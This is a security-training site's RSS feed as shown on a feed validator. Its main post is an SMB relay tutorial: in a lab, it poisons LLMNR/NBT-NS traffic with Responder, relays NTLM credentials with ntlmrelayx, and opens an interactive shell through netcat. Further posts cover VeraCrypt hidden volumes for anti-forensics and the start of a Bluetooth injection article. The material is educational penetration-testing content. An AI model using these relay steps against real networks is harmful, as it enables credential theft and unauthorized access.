Congratulations!

[Valid RSS] This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

Source: https://www.hackers-arise.com/blog-feed.xml

  1. <?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Hackers Arise]]></title><description><![CDATA[hackers-arise]]></description><link>https://www.hackers-arise.com</link><generator>RSS for Node</generator><lastBuildDate>Thu, 25 Apr 2024 19:17:44 GMT</lastBuildDate><atom:link href="https://www.hackers-arise.com/blog-feed.xml" rel="self" type="application/rss+xml"/><item><title><![CDATA[Hackers-Arise Offers the Best Cybersecurity Training on the Planet! Hear What our Students are Saying!]]></title><description><![CDATA[Hackers-Arise Offers the Best Cybersecurity Training on the Planet! We attract superior students from around the globe! Don't take our...]]></description><link>https://www.hackers-arise.com/post/hackers-arise-offers-the-best-cybersecurity-training-on-the-planet</link><guid isPermaLink="false">6628655e9c879718b7a0e14c</guid><pubDate>Wed, 24 Apr 2024 19:12:18 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_e98dd10ae25d4291b4a260ea4c45c1b8~mv2.jpeg/v1/fit/w_600,h_200,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p>Hackers-Arise Offers the Best Cybersecurity Training on the Planet! </p>
  2. <p><br /></p>
  3. <p>We attract superior students from around the globe! </p>
  4. <p><br /></p>
  5. <p><br /></p>
  6. <figure><img src="https://static.wixstatic.com/media/6a4a49_3fee0d8e389949aca1d82109872c36b6~mv2.jpg/v1/fit/w_572,h_171,al_c,q_80/file.png"></figure>
  7. <p><br /></p>
  8. <p><br /></p>
  9. <p>Don&apos;t take our word for it, look what are students are saying! These are all unsolicited testimonials from real people!</p>
  10. <p><br /></p>
  11. <p><br /></p>
  12. <figure><img src="https://static.wixstatic.com/media/6a4a49_9c01278c0ff749938ad2245b538729f2~mv2.png/v1/fit/w_627,h_813,al_c,q_80/file.png"></figure>
  13. <p><br /></p>
  14. <p><br /></p>
  15. <p><br /></p>
  16. <figure><img src="https://static.wixstatic.com/media/6a4a49_ca6d22a24eec43949720008cb8547854~mv2.png/v1/fit/w_617,h_794,al_c,q_80/file.png"></figure>
  17. <p><br /></p>
  18. <p><br /></p>
  19. <p><br /></p>
  20. <p>To participate in this state-of-the art training, we offer multiple training packages. One for nearly every budget and every skill level, such as:</p>
  21. <p><br /></p>
  22. <p><span style="color: #0D12E9;"><strong>Member Gold</strong></span>- This is a monthly program where you can study online all of the over 30 courses in the Subscriber package.</p>
  23. <p><br /></p>
  24. <p><span style="color: #0D12E9;"><strong>Subscriber</strong></span>- This is our most popular program. You can attend live trainings by Master OTW and study previous courses in the Subscriber package online. These courses are for those in the beginner to intermediate level.</p>
  25. <p><br /></p>
  26. <p><span style="color: #0D12E9;"><strong>Subscriber Pro</strong></span>- This is our ultimate package. It includes all the courses here at Hackers-Arise and includes our advanced and specialty courses such as Satellite Hacking, SCADA Hacking, IoT Hacking, IP Camera Hacking, Bitcoin Forensics and many more!</p>
  27. <p><br /></p>
  28. <p>For more on our many training packages and Subscriptions, <u><a href="https://hackers-arise.net/training/" rel="noreferrer" target="_blank"><span style="color: #0D12E9;">click here.</span></a></u></p>]]></content:encoded></item><item><title><![CDATA[Hacking Active Directory]]></title><description><![CDATA[Agent, your mission—code-named "Digital Lockpick"—is set within the cyber walls of Active Directory, the nexus of network security. Your...]]></description><link>https://www.hackers-arise.com/post/hacking-active-directory</link><guid isPermaLink="false">6621071c4a2590524763432c</guid><pubDate>Mon, 22 Apr 2024 18:16:08 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_47b8a8422c154a638dae07acd5b94c36~mv2.png/v1/fit/w_1000,h_1000,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  29. <figure><img src="https://static.wixstatic.com/media/6a4a49_47b8a8422c154a638dae07acd5b94c36~mv2.png/v1/fit/w_1000,h_1000,al_c,q_80/file.png"></figure>
  30. <p><br /></p>
  31. <p style="text-align: justify;">Agent, your mission—code-named &quot;Digital Lockpick&quot;—is set within the cyber walls of Active Directory, the nexus of network security. Your mission, should you choose to accept it: to exploit the Server Message Block (SMB) protocol, a seemingly innocuous yet vital pathway through which information travels.</p>
  32. <p><br /></p>
  33. <p style="text-align: justify;">This operation hinges on mastering the SMB Relay Attack, a tactic that will allow you to navigate through secured checkpoints without detection, bypassing traditional credentials. With Impacket as your toolkit and its <strong>-i</strong> switch as your master key, you&apos;ll be able to open doors that were never meant to be unlocked.</p>
  34. <p><br /></p>
  35. <p style="text-align: justify;">Expect resistance. The network is vigilant, and time is of the essence. Your skills in maneuvering through these digital corridors must be precise. The objective? To demonstrate the art of the possible and to expose the chinks in the armor of network security.</p>
  36. <p><br /></p>
  37. <p style="text-align: justify;"><strong>Setting up the stage for our SMB Relay Attack</strong></p>
  38. <p><br /></p>
  39. <p style="text-align: justify;">Before diving into the mechanics of the attack, let&apos;s set up our virtual stage. Our lab consists of a modern setup with a Windows Server 2022 acting as the cornerstone of our Active Directory domain. Alongside it, we have two virtual machines—let&apos;s call them smouk1 and smouk2—both joined to the domain, mimicking a typical enterprise environment. Our attack platform is a Kali Linux machine, strategically positioned within the same network to interact directly with these Windows entities.</p>
  40. <p><br /></p>
  41. <p style="text-align: justify;"><strong>Introducing the Responder tool</strong></p>
  42. <p><br /></p>
  43. <p style="text-align: justify;">To kick things off, we&apos;ll start with a critical tool in our arsenal: <span style="color: #67ed1a;"><span style="background-color: #000000;"><strong> Responder </strong></span></span> For those unfamiliar, Responder is a powerful network tool for protocol analysis and network forensics. It&apos;s especially notorious for its ability to listen to network traffic and respond to service requests such as LLMNR, NBT-NS, and MDNS, which are often used as a fallback when DNS fails. By doing so, it can poison the service request and redirect the traffic to the attacker’s machine, essentially enabling us to intercept or manipulate these communications.</p>
  44. <p style="text-align: justify;">In our scenario, we’ll launch Responder with a specific set of options to maximize its effectiveness:</p>
  45. <p><br /></p>
  46. <figure><img src="https://static.wixstatic.com/media/6a4a49_88ce5bb4ddfa4a2fa489392e491acf0a~mv2.png/v1/fit/w_606,h_128,al_c,q_80/file.png"></figure>
  47. <p><br /></p>
  48. <p style="text-align: justify;"><strong>Here’s what each switch means:</strong></p>
  49. <ul>
  50.  <li><p style="text-align: justify;"><span style="color: #00e689;"><span style="background-color: #000000;"><strong>-I eth0</strong></span></span>: Specifies the network interface to listen on, which is <strong>eth0</strong> in our case. This should be adapted if your network interface has a different name.</p></li>
  51.  <li><p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>-d</strong></span></span>: Enables SMB and HTTP server functionalities, critical for the types of attacks we’re focusing on.</p></li>
  52.  <li><p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>-P</strong></span></span>: Enables Responder&apos;s proxy functionalities, allowing it to forward traffic after manipulating it, providing a seamless yet deceptive flow.</p></li>
  53.  <li><p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>-v</strong></span></span>: Runs Responder in verbose mode, giving us a detailed output of all the operations it’s performing, which is invaluable for understanding the attack’s progression in real-time.
  54. </p></li>
  55. </ul>
  56. <p style="text-align: justify;">By setting up Responder this way, we&apos;re effectively preparing to intercept and manipulate the SMB communications, laying the groundwork for executing our SMB Relay Attack. This strategic use of Responder not only illustrates the vulnerabilities present in network configurations but also underscores the importance of securing network protocols against such intrusions, also make sure that SMB and HTTP options are turned off.</p>
  57. <p><br /></p>
  58. <p style="text-align: justify;"><strong>Launching the attack with Impacket&apos;s-ntlmrelayx</strong></p>
  59. <p><br /></p>
  60. <p style="text-align: justify;">With Responder quietly laying the groundwork by capturing traffic, the next step is to introduce a more direct attack tool—<span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>Impacket&apos;s-ntlmrelayx</strong></span></span>. This tool is designed to perform the actual SMB Relay Attack by relaying NTLM authentication sessions and attempting unauthorized access to the network resources.</p>
  61. <p><br /></p>
  62. <p><strong>How ntlmrelayx fits into our strategy</strong></p>
  63. <p><br /></p>
  64. <p style="text-align: justify;">Once we&apos;ve intercepted the authentication requests with Responder, <strong>ntlmrelayx</strong> takes the baton and uses those credentials to gain unauthorized access. To set this up in our lab environment, we use the following command:</p>
  65. <p><br /></p>
  66. <figure><img src="https://static.wixstatic.com/media/6a4a49_685823f652ec42d29312cf22fdea28da~mv2.png/v1/fit/w_1000,h_64,al_c,q_80/file.png"></figure>
  67. <p><br /></p>
  68. <p style="text-align: justify;"><strong>Here’s the breakdown of the command options:</strong></p>
  69. <ul>
  70.  <li><p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>-tf iptargets.txt</strong></span></span>: This option tells <strong>ntlmrelayx</strong> where to find the list of target IP addresses. In our case, <strong>iptargets.txt</strong> contains the IPs of our Windows Server 2022 and the two domain-joined VMs.</p></li>
  71.  <li><p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>-smb2support</strong></span></span>: Enables the tool to support SMB2, which is crucial given the modern Windows environments we are dealing with that likely use SMB2 or SMB3 by default.</p></li>
  72.  <li><p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>-i</strong></span></span>: This critical switch initiates an interactive SMB shell on successful relay, allowing us to execute commands directly on the target system.</p></li>
  73. </ul>
  74. <p><br /></p>
  75. <p style="text-align: justify;">Using <strong>ntlmrelayx</strong> with these parameters allows us to not just authenticate as the intercepted user but also to interact with the compromised system as if we were legitimately logged in. This can be incredibly powerful and dangerous, providing direct access to execute commands, deploy payloads, or even create new user accounts for persistent access.</p>
  76. <p><br /></p>
  77. <p style="text-align: justify;">This step is where theory meets practice, and we see the real-time effects of how intercepted credentials can be leveraged to breach network defenses. It&apos;s a potent demonstration of why network security measures, such as SMB Signing and proper network segmentation, are crucial for protecting against such sophisticated attacks.</p>
  78. <p><br /></p>
  79. <figure><img src="https://static.wixstatic.com/media/6a4a49_17fcbbb5642549d59376949f0ffb50e0~mv2.png/v1/fit/w_749,h_501,al_c,q_80/file.png"></figure>
  80. <p><br /></p>
  81. <p><br /></p>
  82. <p style="text-align: justify;">Upon launching <strong>ntlmrelayx</strong> with our targeted approach, the screen comes alive with confirmation of our preparatory steps. The output indicates that various protocol clients have been successfully loaded, including those for SMB, HTTP(S), LDAP(S), and more. These are the tools of the trade for <strong>ntlmrelayx</strong>, each representing a different method of communication that the tool can exploit.</p>
  83. <p><br /></p>
  84. <p style="text-align: justify;">The line &quot;Running in relay mode to hosts in targetfile&quot; is especially significant. It means our relay setup is armed and active, ready to intercept any authentication request sent to the IPs listed in our <strong>iptargets.txt</strong> file.</p>
  85. <p><br /></p>
  86. <p style="text-align: justify;">With services for HTTP and SMB set up and listening, and a RAW Server waiting on port 6666, our digital trap is set. We’re effectively standing by, waiting for network conversations to eavesdrop on or hijack—this is the hacker&apos;s stakeout. The simplicity of the output belies the complexity and potential impact of what&apos;s happening under the hood: we&apos;ve created a multifaceted surveillance system that&apos;s waiting for the opportune moment to strike.</p>
  87. <p><br /></p>
  88. <p style="text-align: justify;">As we see the final message, &quot;Servers started, waiting for connections,&quot; the anticipation builds. We are now in the critical phase of the attack, where any moment could lead to the breakthrough we need to access the targeted systems. This is where patience pays off in the world of network penetration testing.</p>
  89. <p><br /></p>
  90. <figure><img src="https://static.wixstatic.com/media/6a4a49_f289dcf6d45d4113a4a2e3e6f1c81a43~mv2.png/v1/fit/w_1000,h_994,al_c,q_80/file.png"></figure>
  91. <p><br /></p>
  92. <p><br /></p>
  93. <p style="text-align: justify;"><strong>The moment of truth: attack execution and user interaction</strong></p>
  94. <p><br /></p>
  95. <p style="text-align: justify;">As the user on the network reaches out to a shared resource, a login prompt stands guard, denying entry to the digital trove. Little do they know, this routine action triggers a cascade within our attack framework. The terminal on the left springs to life, logging each step of our orchestrated ambush—Responder springs its trap, capturing the query, and poisoning the network’s attempts at resolution.</p>
  96. <p><br /></p>
  97. <p style="text-align: justify;">The symphony of protocols listed confirms the preparedness of our tools, from IMAP to LDAP, ready to impersonate and deceive. As Responder lays the false tracks, <strong>ntlmrelayx</strong> waits in the shadows, primed for action. Suddenly, the connection is made—our target unwittingly shakes hands with the enemy, and the attack sequence initiates. Success and failure messages flicker in real-time; this is the ebb and flow of cyber combat.</p>
  98. <p><br /></p>
  99. <p style="text-align: justify;">In the face of an &apos;Access Denied&apos; prompt, the real drama unfolds out of sight, recorded in the logs of our Kali machine. Here, every attempt is a potential key to the kingdom. Each &quot;Authenticating against&quot; line is a narrative of siege warfare, as <strong>ntlmrelayx</strong> relentlessly probes for a chink in the armor.</p>
  100. <p><br /></p>
  101. <figure><img src="https://static.wixstatic.com/media/6a4a49_4c9ddfd358e44e90992b2d43288235de~mv2.png/v1/fit/w_931,h_272,al_c,q_80/file.png"></figure>
  102. <p><br /></p>
  103. <p style="text-align: justify;">As the digital dust settles from the initial engagement, we open a new line of communication on our attacker machine—a command line interface that serves as the gateway to our newly compromised domain. By executing <strong>nc 127.0.0.1 11000</strong>, we invoke Netcat, the network utility dubbed the Swiss Army knife of networking, to connect to a local port opened by the <strong>ntlmrelayx</strong> attack.</p>
  104. <p><br /></p>
  105. <p style="text-align: justify;">This simple, yet powerful command, <strong>nc</strong> (Netcat), followed by the loopback address <strong>127.0.0.1</strong> and port <strong>11000</strong>, is our secret knock on the backdoor we&apos;ve just installed. The prompt that follows, &quot;Type help for list of commands&quot;, is the whisper of a hidden world now at our fingertips. We are in—inside a shell that grants us the power to commandeer the target system.</p>
  106. <p><br /></p>
  107. <p style="text-align: justify;">The <strong>#</strong> symbol at the command prompt is the new ground zero, from where we can launch further reconnaissance, escalate privileges, or exfiltrate data, all depending on the commands we choose to execute next. This is the culmination of our SMB Relay Attack, where we step through the looking glass into the heart of the target system, poised to explore the secrets it holds.</p>
  108. <p><br /></p>
  109. <p><br /></p>
  110. <p style="text-align: justify;"><strong>Conclusion and a technical debrief on the SMB Relay attack</strong></p>
  111. <p><br /></p>
  112. <p style="text-align: justify;">Setting aside the playful spirit of the narrative, <strong>aspiring hackers, pentesters, red teamers, and even blue teamers must</strong> grasp the essence of what we&apos;ve accomplished here. We commenced with a controlled lab setup, using a <strong>Windows Server 2022</strong> and <strong>two VMs within an Active Directory domain</strong>, along with our attack platform, a <strong>Kali Linux</strong> machine.</p>
  113. <p><br /></p>
  114. <p style="text-align: justify;">Utilizing the <strong>Responder</strong> tool, we initiated the first phase by capturing network traffic and exploiting the trust of fallback protocols like LLMNR and NBT-NS, leading to the poisoning of these service requests. This step is crucial as it allows for the interception of NTLM authentication attempts.</p>
  115. <p><br /></p>
  116. <p style="text-align: justify;">Following this setup, we introduced the <strong>ntlmrelayx</strong> utility from the Impacket suite to execute the relay attack. The command-line flags were meticulously chosen: <strong>-tf</strong> to target a predefined list of IP addresses, <strong>-smb2support</strong> to enable compatibility with the prevalent SMB protocol version in modern systems, and <strong>-i</strong> to trigger an interactive shell upon successful exploitation.</p>
  117. <p><br /></p>
  118. <p style="text-align: justify;">As the user on the target network attempted to access a shared resource, our interception techniques via Responder manipulated the network traffic, redirecting the authentication process to our attacker-controlled machine. With <strong>ntlmrelayx</strong>, these intercepted credentials were then used to authenticate against the target, allowing us to gain unauthorized access.</p>
  119. <p><br /></p>
  120. <p style="text-align: justify;">The terminal output displayed the status of our engagement, capturing the to-and-fro of network requests and the attempts at relayed authentication — a testament to the potency of our strategy. Upon achieving a successful relay, we utilized Netcat to connect to the listening port established by <strong>ntlmrelayx</strong>, granting us an interactive command shell on the target system. This access marked the culmination of the attack, providing us the capability to execute arbitrary commands within the compromised environment.</p>
  121. <p><br /></p>
  122. <p style="text-align: justify;">This exercise illustrates the vulnerability of network protocols and the importance of securing them against such intrusions. It also highlights the necessity for rigorous security measures, like enforcing SMB signing and educating network users to prevent credential interception and relay attacks. As you reflect on this operation, remember that the true strength of a cybersecurity professional lies not only in understanding how to execute these attacks but also in applying this knowledge to defend and secure networks against potential threats.</p>
  123. <p><br /></p>
  124. <p style="text-align: justify;"><em><strong>Smouk out!</strong></em></p>
  125. <p style="text-align: justify;"><u><a href="https://twitter.com/IamSmouk" rel="noreferrer" target="_blank"><em><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>Follow me on X</strong></span></span></em></a></u></p>
  126. <p><br /></p>
  127. <p style="text-align: justify;">If you want to learn more about Hacking Active Directory take a look at our brand new course <u><a href="https://hackersarise.thinkific.com/courses/active-directory-for-hackers" target="_blank"><span style="color: #0D12E9;"><strong>Active Directory for Hackers</strong></span></a></u><span style="color: #000000;"> part of our </span><u><a href="https://hackersarise.thinkific.com/bundles/subscriber" target="_blank"><span style="color: #0D12E9;"><strong>Subscriber </strong></span></a></u><span style="color: #000000;">Training Level.</span></p>
  128. <p><br /></p>]]></content:encoded></item><item><title><![CDATA[Anti-Forensics: Using Veracrypt to Hide Your Most Sensitive Data]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! In our industry, we often carry around some very valuable and sensitive data. This might include...]]></description><link>https://www.hackers-arise.com/post/anti-forensics-using-veracrypt-to-hide-your-most-sensitive-data</link><guid isPermaLink="false">661e9c4cad2035ff880cea8c</guid><pubDate>Wed, 17 Apr 2024 15:21:54 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_60ccc257ae824d908efb7832cee7d587~mv2.jpg/v1/fit/w_275,h_183,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  129. <p style="text-align: justify;">Welcome back, my aspiring cyberwarriors!</p>
  130. <p><br /></p>
  131. <p style="text-align: justify;">In our industry, we often carry around some very valuable and sensitive data. This might include a bug bounty technique, a zero-day, future plans in our cyberwar, or simply confidential information on our family and friends that they have shared with us. It is critical that this information not fall into the wrong hands if our laptop is stolen or misplaced.</p>
  132. <p><br /></p>
  133. <p><br /></p>
  134. <figure><img src="https://static.wixstatic.com/media/6a4a49_60ccc257ae824d908efb7832cee7d587~mv2.jpg/v1/fit/w_275,h_183,al_c,q_80/file.png"></figure>
  135. <p><br /></p>
  136. <p><br /></p>
  137. <p style="text-align: justify;">As you know, a password protected operating system will not protect your data from a skilled investigator. Data on your hard drive can be accessed using a live boot forensic operating system or simply removing your hard drive from the system and copying the key clusters.</p>
  138. <p><br /></p>
  139. <p style="text-align: justify;">To keep your data safe, you need to encrypt your data on your hard drive.  although both Apple and Microsoft offer data encryption applications both companies have shown themselves to be untrustworthy guardians of your data. Let&apos;s use an open-source application with a good track record and not beholden to some untrustworthy corporate behemoth who will sell your data to the highest bidder.</p>
  140. <p><br /></p>
  141. <p style="text-align: justify;">Once there was an application known as TrueCrypt that was open-source and  successful in keeping your data safe. Unfortunately, the developers discontinued support of this product. Fortunately for us, another group of developers forked TrueCrypt to another product they called VeraCrypt.</p>
  142. <p><br /></p>
  143. <p style="text-align: justify;">VeraCrypt is a software utility used for on-the-fly encryption (OTFE). It&apos;s a fork of the discontinued TrueCrypt project, which means it was developed based on TrueCrypt&apos;s source code but with additional improvements and security enhancements. VeraCrypt can create a virtual encrypted disk within a file or encrypt a partition or the entire storage device with pre-boot authentication.</p>
  144. <p><br /></p>
  145. <p style="text-align: justify;">Some of the key features of VeraCrypt include:</p>
  146. <ol>
  147.  <li><p style="text-align: justify;"><strong>Enhanced Security</strong>: VeraCrypt uses more robust encryption algorithms and more complex key derivation procedures than TrueCrypt. This makes it more resistant to brute-force attacks.</p></li>
  148.  <li><p style="text-align: justify;"><strong>Encryption</strong>: It supports various encryption algorithms, including AES, Serpent, and Twofish, and combinations of these.</p></li>
  149.  <li><p style="text-align: justify;"><strong>Cross-Platform</strong>: VeraCrypt is available for Windows, macOS, and Linux, making it versatile for different user environments.</p></li>
  150.  <li><p style="text-align: justify;"><strong>Hidden Volumes</strong>: It can create a hidden volume within another volume. This feature allows plausible deniability, where even if forced to reveal a password, the hidden volume&apos;s existence can remain undisclosed.</p></li>
  151. </ol>
  152. <p><br /></p>
  153. <p style="text-align: justify;">Let&apos;s download and test Veracrypt!</p>
  154. <p><br /></p>
  155. <h2>Step #1 Download and Install Veracrypt</h2>
  156. <h2></h2>
  157. <p style="text-align: justify;">In this tutorial, I will be downloading and installing Veracrypt to my Kali Linux system, but the instructions are nearly identical for use with the MacOS and Windows.</p>
  158. <p><br /></p>
  159. <p style="text-align: justify;">You can download veracrypt here.</p>
  160. <p><br /></p>
  161. <p style="text-align: justify;"><u><a href="https://www.veracrypt.fr/en/Downloads.html" target="_blank"><span style="color: #0D12E9;">https://www.veracrypt.fr/en/Downloads.html</span></a></u></p>
  162. <p><br /></p>
  163. <p><br /></p>
  164. <figure><img src="https://static.wixstatic.com/media/6a4a49_ce3b956dc89a4e998e2ab2d8b471d73a~mv2.png/v1/fit/w_1000,h_624,al_c,q_80/file.png"></figure>
  165. <p><br /></p>
  166. <p style="text-align: justify;">I have indicated the package I used for my 64-bit Kali Linux in the image above, but if you are using MacOS or Windows, make certain to download the appropriate package.</p>
  167. <p><br /></p>
  168. <p style="text-align: justify;">Once the application has completely downloaded, you will need to unpack the compressed application. In Kali, the default archive manager is Engrampa and it will automatically open when your application completes its download. Simply click on the Extract button and Engrampa with uncompress your file.</p>
  169. <p><br /></p>
  170. <p><br /></p>
  171. <figure><img src="https://static.wixstatic.com/media/6a4a49_d883a5f983ba440f84d9412cd59f0169~mv2.png/v1/fit/w_772,h_533,al_c,q_80/file.png"></figure>
  172. <p><br /></p>
  173. <p style="text-align: justify;">Now, go ahead and click the Extract button.</p>
  174. <p><br /></p>
  175. <figure><img src="https://static.wixstatic.com/media/6a4a49_16169febf6c94265813e5569cde48bfd~mv2.png/v1/fit/w_772,h_436,al_c,q_80/file.png"></figure>
  176. <p><br /></p>
  177. <p><br /></p>
  178. <p style="text-align: justify;">You should now have several versions of Veracrypt in your Downloads directory. I am using the  veracrypt-1.26.7-setup-gui-x64 on my Kali.</p>
  179. <p><br /></p>
  180. <p><br /></p>
  181. <figure><img src="https://static.wixstatic.com/media/6a4a49_443191fdd5454e588f3fbe2db81741f1~mv2.png/v1/fit/w_463,h_103,al_c,q_80/file.png"></figure>
  182. <p><br /></p>
  183. <h2><strong>Step</strong><span style="color: #272c2e;"><strong> # 2</strong></span><strong> Install and Enable Veracrypt</strong></h2>
  184. <p><br /></p>
  185. <p><br /></p>
  186. <p style="text-align: justify;">Once you have executed the setup script, you should be greeted then by a screen such as seen below asking you to select an installation option. I selected 1.</p>
  187. <p><br /></p>
  188. <figure><img src="https://static.wixstatic.com/media/6a4a49_5df29203e6a141bbab9ba7ff6a45a0f9~mv2.png/v1/fit/w_790,h_271,al_c,q_80/file.png"></figure>
  189. <p><br /></p>
  190. <p style="text-align: justify;">Once you enter 1, the application will ask you to read and agree to all the End User agreement. When you agree, Veracrypt will run it&apos;s script and install all of its components.</p>
  191. <p><br /></p>
  192. <p><br /></p>
  193. <figure><img src="https://static.wixstatic.com/media/6a4a49_f2aac31cd2ad4c7f9198ab91b402d5a2~mv2.png/v1/fit/w_749,h_479,al_c,q_80/file.png"></figure>
  194. <p><br /></p>
  195. <p style="text-align: justify;">Now, you only need to enter the command &quot;veracrypt&quot;.</p>
  196. <p><br /></p>
  197. <p style="text-align: justify;"><strong>kali &gt; veracrypt</strong></p>
  198. <p><br /></p>
  199. <p style="text-align: justify;">This should open a window like that below.</p>
  200. <p><br /></p>
  201. <p><br /></p>
  202. <figure><img src="https://static.wixstatic.com/media/6a4a49_d369a19bb25b4e90aec8cf6a83bed4d9~mv2.png/v1/fit/w_800,h_693,al_c,q_80/file.png"></figure>
  203. <p><br /></p>
  204. <p style="text-align: justify;">Select &quot;Create Volume&quot;.</p>
  205. <p><br /></p>
  206. <figure><img src="https://static.wixstatic.com/media/6a4a49_786487a42eda41b29aae0ffb6aac9196~mv2.png/v1/fit/w_1000,h_598,al_c,q_80/file.png"></figure>
  207. <p><br /></p>
  208. <p style="text-align: justify;">Next, select &quot;Create an encrypted file container&quot;.</p>
  209. <p><br /></p>
  210. <figure><img src="https://static.wixstatic.com/media/6a4a49_abc17577edc1477d9485fac9deb624cc~mv2.png/v1/fit/w_1000,h_677,al_c,q_80/file.png"></figure>
  211. <p><br /></p>
  212. <p style="text-align: justify;">At this point, you can choose to create a standard Veracrypt volume or a Hidden Veracrypt volume. For extra security, I selected the hidden volume.</p>
  213. <p><br /></p>
  214. <figure><img src="https://static.wixstatic.com/media/6a4a49_50eef43f8e6f4624a8d1e656a385b7e0~mv2.png/v1/fit/w_1000,h_724,al_c,q_80/file.png"></figure>
  215. <p><br /></p>
  216. <p style="text-align: justify;">Now, we are asked what type of encryption to use to encrypt the volume. AES is the default, but there are many other choices including nested encryption by 2 or 3 encryption algorithms. In this case, the data is first encrypted with one type of encryption and then the encrypted data is encrypted again with a different encryption algorithm. This makes it VERY difficult for anyone to decipher the data but it also adds latency to the availability of the data since the data must go through multiple rounds of encryption. I only use these nested encryption for my most sensitive data.</p>
  217. <p><br /></p>
  218. <figure><img src="https://static.wixstatic.com/media/6a4a49_15d0ffdc67e84db480e3cdc00cd95a08~mv2.png/v1/fit/w_885,h_582,al_c,q_80/file.png"></figure>
  219. <p><br /></p>
  220. <p style="text-align: justify;">Once you have selected your encryption algorithm, you will be asked for the size of the volume.</p>
  221. <p><br /></p>
  222. <figure><img src="https://static.wixstatic.com/media/6a4a49_0df1c5ffb3f84a4da5dc04bb3d745a6a~mv2.png/v1/fit/w_1000,h_589,al_c,q_80/file.png"></figure>
  223. <p style="text-align: justify;">Finally, you will be asked for your password. Make certain it is long and complex to prevent brute force attacks.</p>
  224. <p><br /></p>
  225. <figure><img src="https://static.wixstatic.com/media/6a4a49_f9a718d791234cb2a3a3c3639a218783~mv2.png/v1/fit/w_1000,h_593,al_c,q_80/file.png"></figure>
  226. <p><br /></p>
  227. <p style="text-align: justify;">At this stage, you are asked whether you will be encrypting very large files. If you are encrypting files over 4gb, you file system choices are limited.</p>
  228. <p><br /></p>
  229. <figure><img src="https://static.wixstatic.com/media/6a4a49_dcc9a6cd509147a5bfef803a60226c58~mv2.png/v1/fit/w_996,h_599,al_c,q_80/file.png"></figure>
  230. <p><br /></p>
  231. <p style="text-align: justify;">Now, we choose the type of file system. In my case, I selected FAT as it can be read by multiple operating systems but can not store files larger than 4gb.</p>
  232. <p><br /></p>
  233. <figure><img src="https://static.wixstatic.com/media/6a4a49_36e8a4ff9565406d97c43d90e8568c01~mv2.png/v1/fit/w_1000,h_597,al_c,q_80/file.png"></figure>
  234. <p><br /></p>
  235. <p style="text-align: justify;">At this point, we need to provide the encryption algorithm some random data. It&apos;s important that this data be <strong>truly random</strong> (rather than pseudo-random such as random number generators in some applications) to make the data as secure as possible. Veracrypt uses your random mouse movements to generator these random numbers for the algorithm.</p>
  236. <p><br /></p>
  237. <figure><img src="https://static.wixstatic.com/media/6a4a49_43b87db0bd924fb2a8eed92b345db857~mv2.png/v1/fit/w_1000,h_592,al_c,q_80/file.png"></figure>
  238. <p><br /></p>
  239. <p><br /></p>
  240. <figure><img src="https://static.wixstatic.com/media/6a4a49_d9b6c576abb7440eb0d8ec47c9e45724~mv2.png/v1/fit/w_1000,h_620,al_c,q_80/file.png"></figure>
  241. <p><br /></p>
  242. <p style="text-align: justify;">Once you have completed the random number generation, Veracrypt will create your encrypted volume.</p>
  243. <p><br /></p>
  244. <h2><strong>Step # 3 Open the Encrypted Volume</strong></h2>
  245. <p><br /></p>
  246. <p style="text-align: justify;">Now, when you want access to the encrypted volume, simply double click on the icon and this window will pop up requesting your password. Make certain to enter your password correctly and the data will available to you and only you!</p>
  247. <p><br /></p>
  248. <figure><img src="https://static.wixstatic.com/media/6a4a49_ec601535c9024ce1bac2bc3cc40575fd~mv2.png/v1/fit/w_646,h_337,al_c,q_80/file.png"></figure>
  249. <p><br /></p>
  250. <h2><strong> Summary</strong></h2>
  251. <p><br /></p>
  252. <p style="text-align: justify;">In many cases, cyberwarriors must make certain that their data is secure. Personal data, corporate data, military plans and strategies can all be compromised by malicious actors or corporate data security plans that are compromised or simply insecure. A tool such as Veracrypt can secure our data even in the case of a stolen laptop or a sophisticated forensics investigator.</p>
  253. <p><br /></p>]]></content:encoded></item><item><title><![CDATA[Bluetooth Hacking: Injecting Commands into a Bluetooth Device with BlueDucky]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! Bluetooth is a nearly ubiquitous protocol used to communicate between devices in close proximity...]]></description><link>https://www.hackers-arise.com/post/bluetooth-hacking-injecting-commands-into-a-bluetooth-device-with-blueducky</link><guid isPermaLink="false">660d9c2040b97f566baa7ab1</guid><pubDate>Thu, 04 Apr 2024 20:49:54 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_9f4b6b932a6f4de2aa9560e2d35a5a54~mv2.png/v1/fit/w_574,h_553,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p>Welcome back, my aspiring cyberwarriors!</p>
  254. <p><br /></p>
  255. <p>Bluetooth is a nearly ubiquitous protocol used to communicate between devices in close proximity or a piconet,  such as speakers, headphones, and cellphones. If an attacker can exploit Bluetooth, it may be able to take control of or eavesdrop on any of these devices.</p>
  256. <p><br /></p>
  257. <figure><img src="https://static.wixstatic.com/media/6a4a49_9f4b6b932a6f4de2aa9560e2d35a5a54~mv2.png/v1/fit/w_574,h_553,al_c,q_80/file.png"></figure>
  258. <p><br /></p>
